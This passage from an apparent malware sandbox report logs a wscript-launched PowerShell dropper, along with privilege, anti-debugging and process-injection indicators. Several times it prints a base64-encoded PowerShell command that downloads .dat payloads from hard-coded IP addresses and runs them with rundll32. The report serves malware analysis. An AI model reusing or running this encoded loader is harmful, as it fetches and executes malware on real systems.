dQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
parent_process wscript.exe martian_process powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQARQByAHkAdABoAHIAYQBlAGkAZABhAGUATQBvAGQAaQBmAHkAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AOQA0AC4AMQAzADEALgAxADEANwAuADMAMAAvAHIAbwBTAE8AZAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAOQAuADEANAA3AC4AMQA3ADcALwBvAFgAagBrAEQAZwB1AEsAWgBQAHcAcwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA0ADUALgA1ADkALgAxADcAMAAuADQAOAAvAE0AUwBlADMAagBNAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANAA1AC4ANgAzAC4ANgA5AC4AMQAxADYALwBKAFEAUgBCAE8AcwBpAGcALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMgAwADYALgA1ADMALgA0ADgALgAyADEALwBaAHgAbQAwAE8ATQBDAHMANwAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAMwAuADIAMAAwAC4AMQA3AC4AMgAwADcALwB6AHgASgBkAGwAbABSAEsAbABKAEcALgBkAGEAdAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIABpAG4AIAAkAEUAcgB5AHQAaAByAGEAZQBpAGQAYQBlAE0AbwBkAGkAZgB5ACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABWAGEAcgBpAG8AbABpAGMAUABzAGUAdQBkAG8AcABhAHIAYQBzAGkAdABpAGMAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADkAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFUAbgBhAGwAYQByAG0AaQBuAGcAbAB5AC4ARAByAG8AbgBhAGcAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABVAG4AYQBsAGEAcgBtAGkAbgBnAGwAeQAuAEQAcgBvAG4AYQBnAGUALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
Process injection Process 1256 resumed a thread in remote process 2156
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000012c
suspend_count: 1
process_identifier: 2156
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe